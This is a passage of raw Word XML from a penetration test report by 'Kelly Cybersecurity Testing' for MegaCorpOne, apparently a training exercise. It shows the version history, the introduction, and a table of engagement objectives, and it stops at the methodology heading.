      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Document History</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a1"/>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblInd w:w="35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2"/>
        <w:gridCol w:w="2273"/>
        <w:gridCol w:w="2272"/>
        <w:gridCol w:w="2273"/>
      </w:tblGrid>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2272"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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2273"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Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2272"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Author(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Comments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2272" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2273" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>03/22/2023</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2272" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Kelly Leihy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2273" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2272" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2273" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3/28/2023</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2272" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Kelly Leihy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2273" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2272" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2273" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3/29/2023</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2272" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Kelly Leihy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2273" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2272" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2273" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>4/4/2023</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2272" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Kelly Leihy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2273" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_2et92p0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidRPr="00CB0356">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_rnmsmppm2qhr" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_tyjcwt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">In accordance with MegaCorpOne’s policies, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Kelly Cybersecurity Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, LLC (henceforth known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>KCT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) conducts external and internal penetration tests of its networks and systems throughout the year. The purpose of this engagement was to assess the networks’ and systems’ security and identify potential security flaws by utilizing industry-accepted testin</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">g methodology and best practices. The project was conducted on a number of systems on MegaCorpOne’s network segments by </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>KCT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> during </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>March-April of 2023</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</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 xml:space="preserve">For the testing, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>KCT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> focused on the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Attempting to determine what system-level vulnerabiliti</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>es could be discovered and exploited with no prior knowledge of the environment or notification to administrators.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Attempting to exploit vulnerabilities found and access confidential information that may be stored on systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Documenting and reporting on a</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ll findings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="30"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>All tests took into consideration the actual business processes implemented by the systems and their potential threats; therefore, the results of this assessment reflect a realistic picture of the actual exposure levels to online hackers. Thi</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>s document contains the results of that assessment.</w:t>
      </w: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13" w:name="_3dy6vkm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Assessment Objective</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_1t3h5sf" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The primary goal of this assessment was to provide an analysis of security flaws present in MegaCorpOne’s web applications, networks, and systems. This assessment was conducted to i</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dentify exploitable vulnerabilities and provide actionable recommendations on how to remediate the vulnerabilities to provide a greater level of security for the environment.</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KCT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> used its proven vulnerability testing methodology to assess all relevant web</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications, networks, and systems in scope. </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MegaCorpOne has outlined the following objectives:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="B5B5B5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:color w:val="B5B5B5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Table 1: Defined Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="B5B5B5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a2"/>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8310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="314"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD4DE"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="350"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Find and exfiltrate any sensitive information within the domain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="341"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Escalate privileges to domain administrator.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="350"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Compromise at least two machines.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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88310F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_2s8eyo1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidRPr="00CB0356">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_duw7fbc1ea6f" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Penetration Testing Methodology</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17" w:name="_17dp8vu" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
